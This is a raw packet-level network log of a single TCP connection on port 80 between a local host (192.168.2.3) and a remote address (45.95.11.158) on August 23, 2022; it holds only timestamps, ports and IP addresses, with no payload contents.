Aug 23, 2022 18:24:02.646626949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646673918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646699905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646714926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646734953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646758080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646785021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646797895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646811962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646836996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646837950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646847963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646878004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647110939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647140026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647166014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647170067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647182941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647192955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647207975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647221088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647233009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647247076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647259951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647274017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647285938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647301912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647310972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647327900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647339106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647372007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647373915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647401094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647413969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647427082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647450924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647454023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647478104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647481918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.647491932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.647519112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.679817915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.679856062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.679882050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.679894924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.679908991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.679924011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.679935932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.679961920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.679965973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.679991961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680007935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680104971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680133104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680150032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680157900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680172920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680186033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680197001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680238962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680260897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680286884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680315018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680330038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680546999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680577040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680598021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680603027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680614948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680629969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.680643082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.680669069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.681842089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.681870937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.681900024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.681899071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.681926012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.681926966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.681936979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.681969881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.682643890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.682671070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.682698965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.682724953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.682729959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.682754993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.682759047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.688328028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.688364983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.688395023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.688421965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.688441038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.688477993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.688483953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.688488960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690262079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690301895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690329075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690352917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690355062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690377951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690382004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690382004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690393925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690426111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690448046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690474987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690490961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690500975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690515041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690527916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690541983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690555096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690571070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690582037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690594912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690607071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690620899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690634966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690645933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690660954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690686941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690692902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690713882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690716982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690737009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690741062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690757990 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690768957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690784931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690795898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690809011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690820932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690843105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690855026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690866947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690877914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690893888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690901041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690917015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690923929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690942049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690947056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690964937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690970898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.690989971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.690994024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691010952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691016912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691034079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691056967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691088915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691112041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691133022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691134930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691153049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691157103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691175938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691198111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691210032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691255093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691263914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691287041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691307068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691310883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691328049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691333055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.691354036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.691375971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.713725090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713756084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713778973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713800907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713823080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713845015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713869095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713890076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713912964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713926077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.713936090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713958025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.713962078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714000940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714031935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714096069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.714149952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.714149952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714207888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714230061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.714252949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.714284897 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714310884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714420080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.714466095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.714473963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.714536905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.715418100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.715441942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.715466976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.715490103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.715493917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.715528965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.715569973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.716284990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.716348886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.716358900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.716382027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.716409922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.716439009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.716453075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.716478109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.716501951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.716517925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.716568947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.722336054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.722369909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.722397089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.722429991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.722453117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.724668026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724733114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724761009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724787951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724812031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724837065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724863052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.724934101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.724970102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.724975109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.724978924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.724982977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725066900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725106955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725131989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725136042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725147963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725172043 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725282907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725308895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725334883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725336075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725347042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725359917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725373983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725387096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725398064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725411892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725440025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725445032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725466013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725466967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725476980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725492954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725512028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725518942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725532055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725547075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725564003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725573063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725588083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725600004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725615025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725625992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725651026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725652933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725662947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725680113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725693941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725707054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725733995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725749016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725755930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725781918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725807905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725811005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725817919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725821018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725835085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.725842953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725873947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.725893021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726116896 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726146936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726176023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726201057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726226091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726250887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726280928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726310968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726316929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726329088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726336956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726363897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726331949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726382017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726386070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726388931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726389885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.726392984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726413965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.726455927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747642994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747689962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747723103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747750998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747780085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747792006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747833967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747838020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747842073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747864008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747924089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747929096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.747945070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.747973919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748004913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748014927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748022079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748050928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748059988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748116016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748131037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748143911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748172045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748189926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748194933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748219013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748222113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748275995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.748349905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748379946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748405933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.748429060 CEST	49827	80	192.168.2.3	45.95.11.158
